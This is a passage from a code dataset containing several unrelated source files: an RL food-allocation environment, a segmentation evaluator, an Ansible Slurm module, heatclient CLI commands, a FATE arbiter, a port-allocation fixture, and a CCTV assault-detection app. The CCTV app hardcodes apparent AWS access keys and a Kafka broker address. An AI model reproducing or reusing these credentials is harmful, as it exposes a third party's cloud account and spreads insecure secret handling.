EpisodeStatus.TIMEOUT:\n terminated = True\n info[\"timeout\"] = True\n self.timeouts += 1\n if self.print_log:\n logging.debug(\"Episode Timeouts.\")\n\n if terminated:\n # self._episode_count += 1\n info[\"leftover\"] = sum(self.bank_stock)\n\n if self.print_log:\n logging.debug(\"Reward = {}\".format(reward).center(60, \"-\"))\n\n return reward, terminated, info\n\n def take_action(self, agent_i, action):\n \"\"\"\n エージェントが行動をとる(選んだ食品を獲得)\n \"\"\"\n if action == self.get_total_actions() - 1:\n # No-op(何もしない)\n if self.print_log:\n logging.debug(\"Agent {}: No-op\".format(agent_i))\n return\n\n food = action\n\n if self.bank_stock[food] > 0:\n # フードバンクから1つ取る\n self.bank_stock[food] -= 1\n # 自身の在庫が1つ増える\n self.agents_stock[agent_i][food] += 1\n if self.print_log:\n logging.debug(\"Agent {}: Get a Food{}\".format(agent_i, food))\n else:\n # 在庫がない(他のエージェントにもうとられた)\n # TODO: 選択した行動と一致していないので検討が必要\n if self.print_log:\n logging.debug(\"Agent {}: Couldn't Get a Food{}\".format(agent_i, food))\n\n def get_satisfaction(self):\n # 残り個数が 最小残り個数+5個以下 だった場合に報酬\n # reward_no_food_waste = 0\n # if sum(self.bank_stock) <= self.ideal_min_leftover + 5:\n # reward_no_food_waste = 10\n\n # 満足度による報酬\n # 各食品の満足度 = 獲得した個数 / 要求個数\n rates = self.agents_stock / self.requests\n # 最大値を1に\n rates[rates > 1.0] = 1.0\n # 各エージェントの満足度 = 各食品の満足度の和\n agents_satisfaction = np.mean(rates, axis=1)\n\n return agents_satisfaction\n\n def get_reward(self, agents_satisfaction):\n \"\"\"\n 報酬関数\n \"\"\"\n\n # 平均\n reward_mean_satis = np.mean(agents_satisfaction)\n # 標準偏差\n reward_std_satis = np.std(agents_satisfaction)\n\n # 重み\n reward = (\n self.reward_mean_weight * reward_mean_satis\n - self.reward_std_weight * reward_std_satis\n )\n\n if self.print_log:\n # logging.debug(\"Agents Stock: {}\".format(self.agents_stock))\n logging.debug(\"Agents Satisfaction: {}\".format(agents_satisfaction))\n logging.debug(\"Leftover Count: {}\".format(sum(self.bank_stock)))\n\n logging.debug(\"Mean Satis.: {}\".format(reward_mean_satis))\n logging.debug(\"Std Satis.: {}\".format(reward_std_satis))\n logging.debug(\"REWARD (Satisfaction): {}\".format(reward))\n\n return reward\n\n def check_status(self):\n \"\"\"\n 食品分配が終わったかどうかの状況チェック\n \"\"\"\n # 最大ステップ数を超えた\n if self._step_count >= self.episode_limit:\n return EpisodeStatus.TIMEOUT\n\n # 獲得個数と要求個数の差\n gap = self.requests - self.agents_stock\n\n # 全てのエージェントの要求が満たされた\n if np.all(gap <= 0):\n return EpisodeStatus.COMPLETED\n\n # 要求のある食品の在庫がもうどれもない(全エージェントの取れる行動がない)\n required_count = np.sum(gap, axis=0)\n required_food_stock = self.bank_stock[required_count > 0]\n if np.all(required_food_stock == 0):\n return EpisodeStatus.COMPLETED\n\n # 継続\n return EpisodeStatus.ONGOING\n\n def get_env_info(self):\n \"\"\"\n 環境のパラメータ\n \"\"\"\n env_info = {\n \"state_shape\": self.get_state_size(),\n \"obs_shape\": self.get_obs_size(),\n \"n_actions\": self.get_total_actions(),\n \"n_agents\": self.n_agents,\n \"episode_limit\": self.episode_limit,\n }\n return env_info\n\n def get_obs_size(self):\n \"\"\"\n 部分観測のサイズを返す\n - 自身の各食品の満足度 (0.0~1.0)\n - 各食品の残量 (0.0~1.0)\n \"\"\"\n return 2 * self.n_foods\n\n def get_state_size(self):\n \"\"\"\n グローバル状態のサイズを返す\n \"\"\"\n return self.get_obs_size() * self.n_agents\n\n def get_total_actions(self):\n \"\"\"\n エージェントがとることのできる行動の数を返す\n \"\"\"\n return self.n_actions\n\n def get_avail_actions(self):\n \"\"\"\n 全エージェントの選択可能な行動をリストで返す\n \"\"\"\n avail_actions = []\n for agent_i in range(self.n_agents):\n avail_agent = np.zeros(self.n_foods)\n # 要求個数以上取れないようにする\n avail_food = (self.bank_stock > 0) & (\n self.agents_stock[agent_i] < self.requests[agent_i]\n )\n # avail_food = self.bank_stock > 0\n avail_agent[avail_food] = 1\n avail_actions.append(np.append(avail_agent, 1))\n\n if self.print_log:\n logging.debug(\"Agent{} Avail Food: {}\".format(agent_i, avail_agent))\n\n # print(avail_actions)\n return avail_actions\n\n def get_obs(self, debug=True):\n \"\"\"\n 全てのエージェントの観測を1つのリストで返す\n - 各食品の残量 (0.0~1.0)\n - 自身の各食品の満足度 (0.0~1.0)\n NOTE: 分散実行時はエージェントは自分自身の観測のみ用いるようにする\n \"\"\"\n _obs = []\n\n # 在庫残りの割合\n remaining = [0 for _ in range(self.n_foods)]\n for food in range(self.n_foods):\n # 残量率\n remaining[food] = self.bank_stock[food] / self.initial_stock[food]\n\n # 要求が満たされた割合\n for agent_i in range(self.n_agents):\n satisfaction = [0 for _ in range(self.n_foods)]\n for food in range(self.n_foods):\n # 満足度\n satisfaction[food] = (\n self.agents_stock[agent_i][food] / self.requests[agent_i][food]\n )\n\n agent_obs = np.concatenate([remaining, satisfaction])\n _obs.append(agent_obs)\n\n if self.print_log and debug:\n logging.debug(\"Obs Agent{}\".format(agent_i).center(60, \"-\"))\n # logging.debug(\n # \"Avail. actions {}\".format(\n # self.get_avail_agent_actions(agent_id)\n # )\n # )\n # logging.debug(\"Move feats {}\".format(move_feats))\n # logging.debug(\"Enemy feats {}\".format(enemy_feats))\n # logging.debug(\"Ally feats {}\".format(ally_feats))\n # logging.debug(\"Own feats {}\".format(own_feats))\n logging.debug(agent_obs)\n\n if self.full_observable:\n _obs = np.array(_obs).flatten().tolist()\n _obs = [_obs for _ in range(self.n_agents)]\n return _obs\n\n def get_state(self):\n \"\"\"\n グローバル状態を返す\n NOTE: この関数は分散実行時は用いないこと\n \"\"\"\n # 各エージェントの観測を結合したものをグローバル状態とする\n obs_concat = np.concatenate(self.get_obs(debug=False), axis=0).astype(\n np.float32\n )\n return obs_concat\n\n # if self.obs_instead_of_state:\n # obs_concat = np.concatenate(self.get_obs(), axis=0).astype(\n # np.float32\n # )\n # return obs_concat\n\n # state_dict = self.get_state_dict()\n\n # state = np.append(\n # state_dict[\"allies\"].flatten(), state_dict[\"enemies\"].flatten()\n # )\n # if \"last_action\" in state_dict:\n # state = np.append(state, state_dict[\"last_action\"].flatten())\n # if \"timestep\" in state_dict:\n # state = np.append(state, state_dict[\"timestep\"])\n\n # state = state.astype(dtype=np.float32)\n\n # if self.debug:\n # logging.debug(\"STATE\".center(60, \"-\"))\n # logging.debug(\"Ally state {}\".format(state_dict[\"allies\"]))\n # logging.debug(\"Enemy state {}\".format(state_dict[\"enemies\"]))\n # if self.state_last_action:\n # logging.debug(\"Last actions {}\".format(self.last_action))\n\n # return state\n\n def close(self):\n return\n","repo_name":"lighthouse117/marl-robots-2d","sub_path":"src/envs_pymarl/foodbank/food_allocation.py","file_name":"food_allocation.py","file_ext":"py","file_size_in_byte":14508,"program_lang":"python","lang":"ja","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"33626133874","text":"import os\nimport copy\nimport numpy as np\nfrom tqdm import tqdm\nimport gc\nimport tensorflow as tf\ntfconfig = tf.ConfigProto()\ntfconfig.gpu_options.allow_growth = True\nsession = tf.Session(config=tfconfig)\nimport keras\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard\nimport models\nimport reader\nimport config as conf\nfrom sklearn.model_selection import train_test_split\nfrom utils import rle_encoding, get_label, lb, label_to_rles\nimport cv2\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom mean_average import average_scores\n\nprint('Loading trained weights...')\n\nunet_model = models.get_U_Net_model(gpus=1, load_weights=conf.U_NET_CKPT)[0]\nunet_model.summary()\n\nprint('Generating metadata...')\nimgs_meta = reader.dataset_filepath(conf.VALID_PATH, get_masks=True)\nimgs_batch, imgs_path, imgs_shape = reader.dir_reader(imgs_meta, height=conf.U_NET_DIM, width=conf.U_NET_DIM)\n\npreds = np.squeeze(unet_model.predict(imgs_batch, batch_size=conf.U_NET_BATCH_SIZE, verbose=1))\n\nprint('Resizing...')\npreds_test_upsampled = []\nfor n in tqdm(range(len(imgs_batch)), total=len(imgs_batch), ascii=True):\n nuclei = cv2.resize(preds[n,...,0], imgs_shape[n])\n marker = cv2.resize(preds[n,...,1], imgs_shape[n])\n dt = cv2.resize(preds[n,...,2], imgs_shape[n])\n preds_test_upsampled.append((nuclei, marker, dt))\n\ndel imgs_batch, preds, dt\ngc.collect() # release memory\n\nprint('Post-processing...')\n\nlabels = []\nfor n, path in tqdm(enumerate(imgs_path), total=len(imgs_path), ascii=True):\n label = get_label(*preds_test_upsampled[n])\n labels.append(label)\n\nmasks = []\nfor meta in tqdm(imgs_meta, total=len(imgs_meta), ascii=True):\n mask_paths = meta['masks']\n mask_4_1_image = []\n for mask_path in mask_paths:\n mask_bool = (cv2.imread(mask_path, cv2.IMREAD_GRAYSCALE)>0).astype(np.bool)\n mask_4_1_image.append(mask_bool)\n masks.append(mask_4_1_image)\n\nprint('Evaluating...')\nthresholds = np.arange(0.5, 1.0, 0.05)\naps, ars = average_scores(masks, labels, thresholds)\nfor ap, ar, t in zip(aps, ars, thresholds):\n print('AP@%.2f = %.4f'%(t, ap))\n print('AR@%.2f = %.4f'%(t, ar))\n print('-'*5)\nprint('mAP@[.5:.95] = %.4f'%np.mean(aps))\nprint('mAR@[.5:.95] = %.4f'%np.mean(ars))\n","repo_name":"peter0749/nuclei_instance_segmentation","sub_path":"lib/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35115239755","text":"#!/usr/bin/python\n\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\nfrom __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nANSIBLE_METADATA = {\n 'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'\n}\n\nDOCUMENTATION = \"\"\"\nmodule: slurm_node_info\nauthor:\n - Alexander Maslennikov (@amaslenn)\nshort_description: List Slurm nodes\ndescription:\n - Retrieve information about nodes on Slurm Workload Manager.\n - For more information, refer to the Slurm documentation at\n U(https://slurm.schedmd.com/scontrol.html).\nversion_added: 1.0.0\nseealso:\n - module: sodalite.hpc.slurm_partition_info\noptions:\n node:\n type: str\n description:\n - Name of the node to retrieve.\n\"\"\"\n\nEXAMPLES = \"\"\"\n- name: List all nodes\n sodalite.hpc.slurm_node_info:\n register: result\n- name: List the selected node\n sodalite.hpc.slurm_node_info:\n node: wn1\n register: result\n- name: Show node\n ansible.builtin.debug:\n msg: \"{{ result.nodes[0] }}\"\n\"\"\"\n\nRETURN = \"\"\"\nnodes:\n description: List of Slurm nodes.\n returned: success\n type: list\n elements: dict\n\"\"\"\n\n\nfrom ansible.module_utils._text import to_text\nfrom ..module_utils import slurm_utils\nfrom ..module_utils.hpc_module import HpcModule\n\n\nclass SlurmNodeInfoModule(HpcModule):\n def __init__(self):\n argument_spec = dict(\n node=dict(type='str', required=False)\n )\n super(SlurmNodeInfoModule, self).__init__(argument_spec)\n\n def run_module(self):\n node_name = self.ansible.params['node']\n command = 'scontrol show node {0}'.format(node_name) if node_name is not None else 'scontrol show nodes'\n stdout = self.execute_command(command)\n\n result = {}\n try:\n result[\"nodes\"] = slurm_utils.parse_output(stdout, \"NodeName\")\n except Exception as err:\n self.ansible.fail_json(\n msg='Failed to parse scontrol output',\n details=to_text(err),\n )\n\n self.ansible.exit_json(changed=False, **result)\n\n\ndef main():\n module = SlurmNodeInfoModule()\n module.run_module()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SODALITE-EU/platform-discovery-service","sub_path":"src/ansible_collections/sodalite/hpc/plugins/modules/slurm_node_info.py","file_name":"slurm_node_info.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4395552739","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n\n\"\"\"Orchestration v1 resource type implementations\"\"\"\n\nimport logging\n\nfrom osc_lib.command import command\nfrom osc_lib import exceptions as exc\nfrom osc_lib.i18n import _\n\nfrom heatclient.common import format_utils\nfrom heatclient.common import utils as heat_utils\nfrom heatclient import exc as heat_exc\n\n\nclass ResourceTypeShow(format_utils.YamlFormat):\n \"\"\"Show details and optionally generate a template for a resource type.\"\"\"\n\n log = logging.getLogger(__name__ + \".ResourceTypeShow\")\n\n def get_parser(self, prog_name):\n parser = super(ResourceTypeShow,\n self).get_parser(prog_name)\n parser.add_argument(\n 'resource_type',\n metavar='<resource-type>',\n help=_('Resource type to show details for'),\n )\n parser.add_argument(\n '--template-type',\n metavar='<template-type>',\n help=_('Optional template type to generate, hot or cfn')\n )\n parser.add_argument(\n '--long',\n default=False,\n action='store_true',\n help=_('Show resource type with corresponding description.')\n )\n return parser\n\n def take_action(self, parsed_args):\n self.log.debug(\"take_action(%s)\", parsed_args)\n\n if parsed_args.template_type is not None and parsed_args.long:\n msg = _('Cannot use --template-type and --long in one time.')\n raise exc.CommandError(msg)\n\n heat_client = self.app.client_manager.orchestration\n return _show_resourcetype(heat_client, parsed_args)\n\n\ndef _show_resourcetype(heat_client, parsed_args):\n try:\n if parsed_args.template_type:\n template_type = parsed_args.template_type.lower()\n if template_type not in ('hot', 'cfn'):\n raise exc.CommandError(\n _('Template type invalid: %s') % parsed_args.template_type)\n\n fields = {'resource_type': parsed_args.resource_type,\n 'template_type': template_type}\n data = heat_client.resource_types.generate_template(**fields)\n else:\n data = heat_client.resource_types.get(parsed_args.resource_type,\n parsed_args.long)\n except heat_exc.HTTPNotFound:\n raise exc.CommandError(\n _('Resource type not found: %s') % parsed_args.resource_type)\n\n rows = list(data.values())\n columns = list(data.keys())\n return columns, rows\n\n\nclass ResourceTypeList(command.Lister):\n \"\"\"List resource types.\"\"\"\n\n log = logging.getLogger(__name__ + '.ResourceTypeList')\n\n def get_parser(self, prog_name):\n parser = super(ResourceTypeList,\n self).get_parser(prog_name)\n parser.add_argument(\n '--filter',\n dest='filter',\n metavar='<key=value>',\n help=_('Filter parameters to apply on returned resource types. '\n 'This can be specified multiple times. It can be any of '\n 'name, version or support_status'),\n action='append'\n )\n parser.add_argument(\n '--long',\n default=False,\n action='store_true',\n help=_('Show resource types with corresponding description of '\n 'each resource type.')\n )\n return parser\n\n def take_action(self, parsed_args):\n self.log.debug(\"take_action(%s)\", parsed_args)\n\n heat_client = self.app.client_manager.orchestration\n return _list_resourcetypes(heat_client, parsed_args)\n\n\ndef _list_resourcetypes(heat_client, parsed_args):\n resource_types = heat_client.resource_types.list(\n filters=heat_utils.format_parameters(parsed_args.filter),\n with_description=parsed_args.long\n )\n if parsed_args.long:\n columns = ['Resource Type', 'Description']\n rows = sorted([r.resource_type, r.description] for r in resource_types)\n else:\n columns = ['Resource Type']\n rows = sorted([r.resource_type] for r in resource_types)\n return columns, rows\n","repo_name":"openstack/python-heatclient","sub_path":"heatclient/osc/v1/resource_type.py","file_name":"resource_type.py","file_ext":"py","file_size_in_byte":4686,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"53"} +{"seq_id":"26900359045","text":"from federatedml.linear_model.coordinated_linear_model.base_linear_model_arbiter import HeteroBaseArbiter\nfrom federatedml.linear_model.coordinated_linear_model.linear_regression.hetero_linear_regression.hetero_linr_base import \\\n HeteroLinRBase\nfrom federatedml.optim.gradient import hetero_linr_gradient_and_loss\nfrom federatedml.param.linear_regression_param import LinearParam\nfrom federatedml.util import consts\nfrom federatedml.transfer_variable.transfer_class.hetero_linr_transfer_variable import HeteroLinRTransferVariable\n\n\nclass HeteroLinRArbiter(HeteroBaseArbiter, HeteroLinRBase):\n def __init__(self):\n super(HeteroLinRArbiter, self).__init__()\n self.gradient_loss_operator = hetero_linr_gradient_and_loss.Arbiter()\n self.model_param = LinearParam()\n self.n_iter_ = 0\n self.header = None\n self.model_param_name = 'HeteroLinearRegressionParam'\n self.model_meta_name = 'HeteroLinearRegressionMeta'\n self.model_name = 'HeteroLinearRegression'\n self.is_converged = False\n self.mode = consts.HETERO\n self.need_call_back_loss = True\n self.transfer_variable = HeteroLinRTransferVariable()\n","repo_name":"FederatedAI/FATE","sub_path":"python/federatedml/linear_model/coordinated_linear_model/linear_regression/hetero_linear_regression/hetero_linr_arbiter.py","file_name":"hetero_linr_arbiter.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":5296,"dataset":"github-code","pt":"53"} +{"seq_id":"9308471939","text":"#!/usr/bin/env python3\n\nimport socket\n\nimport pytest\n\nNEXT_PORT = 10000\n\n\ndef check_port(port: int) -> bool:\n tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n with tcp, udp:\n try:\n tcp.bind((\"127.0.0.1\", port))\n udp.bind((\"127.0.0.1\", port))\n return True\n except socket.error:\n return False\n\n\ndef check_port_range(port_range: range) -> bool:\n for port in port_range:\n if not check_port(port):\n return False\n return True\n\n\nclass Ports:\n def allocate(self, num: int) -> int:\n \"\"\"\n Allocates\n \"\"\"\n global NEXT_PORT\n while NEXT_PORT + num <= 65535:\n start = NEXT_PORT\n NEXT_PORT += num\n if not check_port_range(range(start, NEXT_PORT)):\n continue\n return start\n raise Exception(\"cannot find enough free port\")\n\n\n@pytest.fixture\ndef ports() -> Ports:\n return Ports()\n","repo_name":"numtide/deploykit","sub_path":"tests/ports.py","file_name":"ports.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"53"} +{"seq_id":"16973885186","text":"import queue\nfrom re import X\nimport threading\nimport cv2\nimport datetime\nimport time, json\nfrom datetime import datetime\nimport boto3\nimport os\nimport moviepy.editor as moviepy\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\nimport time\nimport torch\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport math\nimport os\nimport tensorflow as tf\nimport numpy as np\nimport cv2\nimport mediapipe as mp\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.keras.utils import to_categorical\nfrom matplotlib import pyplot as plt\n\n# os.environ['KMP_DUPLICATE_LIB_OK']='True'\n\nfrom PIL import Image as im\nfrom PyQt5.QtWidgets import QMainWindow\nfrom QtApp.QtUI.MainUI import Ui_MainWindow\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5 import QtGui, QtWidgets\nfrom PyQt5.QtCore import *\nfrom CCTV.CcTv import CcTv\nfrom kafka import KafkaProducer\nfrom json import dumps\nfrom yolov5.utils.general import (LOGGER, check_img_size, non_max_suppression, scale_coords, \n check_imshow, xyxy2xywh, increment_path)\nfrom yolov5.utils.torch_utils import select_device, time_sync\nfrom yolov5.utils.plots import Annotator, colors\n\nclass roiimage:\n def __init__(self,frame,x,y,w,h):\n self.frame = frame\n self.x = x\n self.y = y\n self.w = w\n self.h = h\n\nclass MainWindow(QMainWindow):\n def initialize(self, mainForm: Ui_MainWindow):\n print(torch.cuda.is_available())\n self.mainForm = mainForm\n self.producer = KafkaProducer(acks=0, compression_type='gzip', bootstrap_servers=['52.79.114.28:9092'], value_serializer=lambda v: json.dumps(v).encode('utf-8')) \n self.setWindowIcon(QIcon(\"icon.png\"))\n self.cnt = 0\n self.cctv_1 = None\n self.cctv_2 = None\n self.cctv_3 = None\n self.cctv_4 = None\n self.assult = False\n self.center_prev_points = []\n self.tracking_objects = {}\n self.track_id = 0\n self.count = -1\n self.static_image_mode=False\n self.upper_body_only = False\n self.roi_person = None\n smoth_landmarks=True\n min_detection_confidence=0.5\n min_tracking_confidence=0.5\n self.roi_que = queue.Queue()\n self.model = torch.hub.load('ultralytics/yolov5', 'custom', path='./yolov5s.pt', force_reload=True)\n self.Frame_1 = None\n # self.model = torch.hub.load('ultralytics/yolov5', 'yolov5m')\n # self.device = select_device(0)\n # cfg = get_config()\n # cfg.merge_from_file(\"deep_sort/configs/deep_sort.yaml\")\n # self.deepsort = DeepSort('osnet_x0_25',\n # max_dist=cfg.DEEPSORT.MAX_DIST,\n # max_iou_distance=cfg.DEEPSORT.MAX_IOU_DISTANCE,\n # max_age=cfg.DEEPSORT.MAX_AGE, n_init=cfg.DEEPSORT.N_INIT, nn_budget=cfg.DEEPSORT.NN_BUDGET,\n # use_cuda=True)\n\n # self.names = self.model.module.names if hasattr(self.model, 'module') else self.model.names\n \n self.s3 = self.s3_connection()\n self.CCTV_start()\n self.thread_CCTV = Worker(target=self.thread_CCTV_run)\n self.thread_CCTV.start()\n self.modeltf = None\n test = Worker(target=self.testfunc)\n test.start()\n\n\n def s3_connection(self):\n try:\n s3 = boto3.client(\n service_name=\"s3\",\n region_name=\"ap-northeast-2\", # 자신이 설정한 bucket region\n aws_access_key_id=\"AKIAZM2UBXT27P5Z2PGL\",\n aws_secret_access_key=\"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\",\n )\n except Exception as e:\n print(e)\n\n else:\n print(\"s3 bucket connected!\")\n return s3\n\n def s3_put_object(self, bucket, filepath, access_key):\n \"\"\"\n s3 bucket에 지정 파일 업로드\n :param s3: 연결된 s3 객체(boto3 client)\n :param bucket: 버킷명\n :param filepath: 파일 위치\n :param access_key: 저장 파일명\n :return: 성공 시 True, 실패 시 False 반환\n \"\"\"\n try:\n self.s3.upload_file(\n Filename=filepath,\n Bucket=bucket,\n Key=access_key,\n ExtraArgs={\"ContentType\": \"video/mp4\", \"ACL\": \"public-read\"},\n )\n print(\"upload video to aws s3!\")\n except Exception as e:\n return False\n return True\n\n def s3_get_image_url(self, filename):\n \"\"\"\n s3 : 연결된 s3 객체(boto3 client)\n filename : s3에 저장된 파일 명\n \"\"\"\n location = self.s3.get_bucket_location(Bucket=\"ssafit-01-bucket\")[\"LocationConstraint\"]\n return f\"https://ssafit-01-bucket.s3.{location}.amazonaws.com/{filename}.mp4\"\n\n def thread_CCTV_run(self):\n Frame_2, Frame3, Frame4 = None, None, None\n center_points = []\n if self.cctv_1 != None and self.cctv_1.grab():\n _, self.Frame_1 = self.cctv_1.retrieve()\n self.count += 1\n if self.Frame_1 is not None:\n result = self.model(self.Frame_1, size=640)\n # result = self.model(Frame_1, augment = True)\n labels, cord = result.xyxyn[0][:,-1].cpu().numpy(), result.xyxyn[0][:, :-1].cpu().numpy()\n\n # annotator = Annotator(Frame_1, line_width=2, pil=not ascii)\n # det = result.pred[0]\n\n # if det is not None and len(det):\n # xywhs = xyxy2xywh(det[:, 0:4])\n # confs = det[:, 4]\n # clss = det[:, 5]\n # outputs = self.deepsort.update(xywhs.cpu(), confs.cpu(), clss.cpu(), Frame_1)\n # if len(outputs) > 0:\n # for j, (output, conf) in enumerate(zip(outputs, confs)):\n\n # bboxes = output[0:4]\n # id = output[4]\n # cls = output[5]\n\n # c = int(cls) # integer class\n # label = f'{id} {self.names[c]} {conf:.2f}'\n # annotator.box_label(bboxes, label, color=colors(c, True))\n\n # result_img = annotator.result()\n\n # print(result)\n ob = -1\n objectpoint = []\n if len(cord)>0:\n temp = []\n for box in cord:\n ob+=1\n if int(labels[ob]) != 0 or box[4] < 0.8:\n continue\n height, width, c = self.Frame_1.shape\n x = box[0]*width\n y = box[1]*height\n w = box[2]*width - x\n h = box[3]*height - y\n self.roi_person = self.Frame_1[int(y):int(y+h),int(x):int(x+w)]\n pose_img = self.roi_person.copy()\n roi_info = roiimage(pose_img, x,y,w,h)\n temp.append(roi_info)\n cx = (x + x + w)/2\n cy = (y + y + h)/2\n center_points.append((int(cx),int(cy)))\n objectpoint.append((int(cx),int(cy)))\n index = 0\n ob = -1\n for pt in objectpoint:\n inner_index = 0\n for pt2 in objectpoint:\n if index >= inner_index:\n inner_index+=1\n continue\n dis = math.hypot(pt2[0] - pt[0], pt2[1] - pt[1])\n if dis<temp[inner_index].w and self.roi_que.empty()==True:\n temp_ob = temp[inner_index]\n self.roi_que.put(temp_ob)\n temp_ob = temp[index]\n self.roi_que.put(temp_ob)\n inner_index+=1\n index+=1\n for box in cord:\n ob+=1\n if int(labels[ob]) != 0 or box[4] < 0.8:\n continue\n height, width, c = self.Frame_1.shape\n x = box[0]*width\n y = box[1]*height\n w = box[2]*width - x\n h = box[3]*height - y\n # cx = (x + x + w)/2\n # cy = (y + y + h)/2\n # center_points.append((int(cx),int(cy)))\n # objectpoint.append((int(cx),int(cy)))\n # # cv2.circle(self.Frame_1, (int(cx),int(cy)), 5, (0,0,255),-1)\n cv2.rectangle(self.Frame_1, (int(x),int(y)), (int(x+w), int(y+h)), (0,255,0), 2)\n if(self.count <= 2):\n for pt in center_points:\n for pt2 in self.center_prev_points:\n distance = math.hypot(pt2[0] - pt[0], pt2[1] - pt[1])\n\n if distance < 50:\n self.tracking_objects[self.track_id] = pt\n self.track_id+=1\n else :\n tracking_objects_copy = self.tracking_objects.copy()\n center_points_copy = center_points.copy()\n\n for object_id,pt2 in tracking_objects_copy.items():\n object_exists = False\n for pt in center_points_copy:\n distance = math.hypot(pt2[0] - pt[0], pt2[1] - pt[1])\n\n if distance < 50:\n self.tracking_objects[object_id] = pt\n object_exists = True\n if pt in center_points:\n center_points.remove(pt)\n continue\n if not object_exists:\n self.tracking_objects.pop(object_id)\n\n for pt in center_points:\n self.tracking_objects[self.track_id] = pt\n self.track_id += 1\n\n for object_id, pt in self.tracking_objects.items():\n cv2.circle(self.Frame_1, pt, 5, (0,0,255), -1)\n cv2.putText(self.Frame_1, str(object_id), (pt[0], pt[1]), 0, 1, (0, 0, 255), 2)\n\n # print(\"TRACKING\")\n # print(self.tracking_objects)\n\n width = (int)((self.mainForm.centralwidget.width()-227)/2)-10\n height = (int)((self.mainForm.centralwidget.height()-20)/2)-10\n pixmap = QtGui.QPixmap(\n self.convert_image_to_QImage(\n self.resize_image(self.Frame_1, width, height)\n # self.resize_image(np.squeeze(result.render()), width, height)\n ))\n self.mainForm.cctv_1.setPixmap(pixmap)\n \n self.mainForm.cctv_1.update()\n self.center_prev_points = center_points.copy()\n\n if self.assult == True : # if 상황이 발생하면\n self.cnt = 1\n t = threading.Thread(target=self.record) # video 녹음 쓰레드\n t.start()\n\n # 형이 하나하나 전처리한 프레임을 리스트에 넣어서 주는 방식으로 하시는지\n # cctv(전처리) -> record\n\n def record(self):\n self.assult = False\n cctv_1 = CcTv.rtsp()\n trigger = True\n flag = True\n start = time.time()\n while trigger == True :\n Frame_1, Frame_2, Frame3, Frame4 = None, None, None, None\n if cctv_1 != None and cctv_1.grab():\n _, Frame_1 = cctv_1.retrieve()\n\n if flag == True :\n print(\"video record start!\")\n now = datetime.datetime.now().strftime(\"%d_%H-%M-%S\")\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n path = \"C:/Users/dlrjs/Desktop/S06P31E202/AI/\" + str(now) + \".avi\"\n realpath = \"C:/Users/dlrjs/Desktop/S06P31E202/AI/\" + str(now) + \".mp4\"\n video = cv2.VideoWriter(\"C:/Users/dlrjs/Desktop/S06P31E202/AI/\" + str(now) + \".avi\", fourcc, 20.0, (Frame_1.shape[1], Frame_1.shape[0]))\n \n flag = False\n \n video.write(Frame_1)\n \n if (time.time() - start) > 5 : # 검출되었으면... 5초후에 저장(프로토타입). ..ex) if (폭력이 감지되면...)\n trigger = False\n video.release()\n clip = moviepy.VideoFileClip(path)\n clip.write_videofile(realpath)\n print(\"video record end!\")\n print(self.s3_put_object(\"ssafit-01-bucket\", realpath, str(now)+ \".mp4\"))\n if os.path.isfile(path):\n os.remove(path)\n if os.path.isfile(realpath):\n os.remove(realpath) \n # connect to web\n url = self.s3_get_image_url(str(now))\n data = {'url' : url,\n 'detection' : '0',\n 'cameraNumber' : '1'}\n self.producer.send('kafka-demo2', value=data)\n \n def CCTV_start(self):\n self.cctv_1 = CcTv.rtsp()\n\n def convert_image_to_QImage(self, img):\n\n height, width, channel = img.shape\n bytesPerLine = width * channel\n format = QtGui.QImage.Format_RGB888\n\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n return QtGui.QImage(img.data, width, height, bytesPerLine, format)\n\n def resize_image(self, img, width, height):\n return cv2.resize(img, dsize=(width, height),fx=0.5, fy=0.5, interpolation=cv2.INTER_AREA)\n def testfunc(self):\n sequence = []\n sentence = []\n predictions = []\n threshold = 0.5\n actions = np.array(['assult', 'stand', 'fall'])\n self.modeltf = tf.keras.models.load_model('action.h5')\n while True:\n if(self.roi_que.empty()!=True):\n frame_info = self.roi_que.get()\n mpDraw = mp.solutions.drawing_utils\n mpPose = mp.solutions.pose\n pose = mpPose.Pose()\n roi = cv2.cvtColor(frame_info.frame,cv2.COLOR_BGR2RGB)\n results = pose.process(roi)\n pose = np.array([[res.x, res.y, res.z, res.visibility] for res in results.pose_landmarks.landmark]).flatten() if results.pose_landmarks else np.zeros(33*4)\n keypoints = np.concatenate([pose])\n sequence.append(keypoints)\n sequence = sequence[-1:]\n if len(sequence) == 1:\n res = self.modeltf.predict(np.expand_dims(sequence, axis=0))[0]\n print(res)\n abnor = actions[np.argmax(res)]\n predictions.append(np.argmax(res))\n if abnor == \"assult\":\n self.assult = True\n str = \"{:%Y%m%d%H%M%S}\".format(datetime.now()) + \" 폭행 발생\"\n self.mainForm.textBrowser.append(str)\n if 